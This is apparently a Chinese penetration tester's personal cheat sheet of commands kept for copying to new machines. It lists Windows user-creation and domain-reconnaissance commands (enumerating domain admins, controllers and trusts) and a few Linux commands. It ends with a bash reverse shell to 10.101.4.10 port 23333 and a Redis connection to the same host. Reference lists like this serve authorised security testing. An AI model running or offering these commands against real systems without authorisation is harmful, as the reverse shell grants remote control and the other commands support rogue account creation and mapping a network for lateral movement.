渗透测试常用命令
渗透测试常用命令
Sircong常用到服务器、工具等命令
记录一些渗透测试中常用到的命令,工作更换设备的时候方便复制。
Windows常用
1、新建用户及加入管理员用户组
1 | net user adminstrator nod@32! /add |
2、修改用户密码
1 | net user administrator nod@32! |
3、删除用户
1 | net user adminstrator /delete |
4、查看所有用户
1 | net user |
5、查看当前在线用户
1 | query user |
6、查看当前主机的主机名/IP/DNS等信息
1 | ipconfig /all |
7、查看路由表信息
1 | route print |
8、查看端口开放情况
1 | netstat -ano |
9、查看arp解析情况
1 | arp -a |
10、查看进程及对应服务名
1 | tasklist /svc |
11、 查看管理员组成员
1 | net localgroup administrators |
12、查看系统信息含补丁信息
1 | systeminfo |
13、查看ipc连接情况
1 | net use |
14、查看匿名共享情况
1 | net view |
15、查看防火墙状态
1 | netsh firewall show state |
域信息
1、查看当前登录域
1 | net config workstation |
2、获得所有域用户列表
1 | net user /domain |
3、查看所有的域
1 | net view /domain |
4、查看该域内所有主机
1 | net view /domain:XXX |
5、查看所有域用户组列表
1 | net group /domain |
6、查看域内所有的主机名
1 | net group "domain computers" /domain |
7、查看所有域管理员
1 | net group "domain admins" /domain |
8、查看所有域控制器
1 | net group "domain controllers" /domain |
9、获取域信任信息
1 | nltest /domain_trusts |
10、查看域密码策略
1 | net accounts /domain |
11、寻找目录中的域控制器
1 | dsquery server |
Liunx常用
1、查看进程
1 | ps -elf |
2、解压缩
1 | unzip 文件名.zip |
其他常用
1、反弹shell
1 | bash -i >& /dev/tcp/10.101.4.10/23333 0>&1 |
2、连接Redis,查看所有key并读取
1 | redis-cli -h 10.101.4.10 -p 6379 |
Related Articles
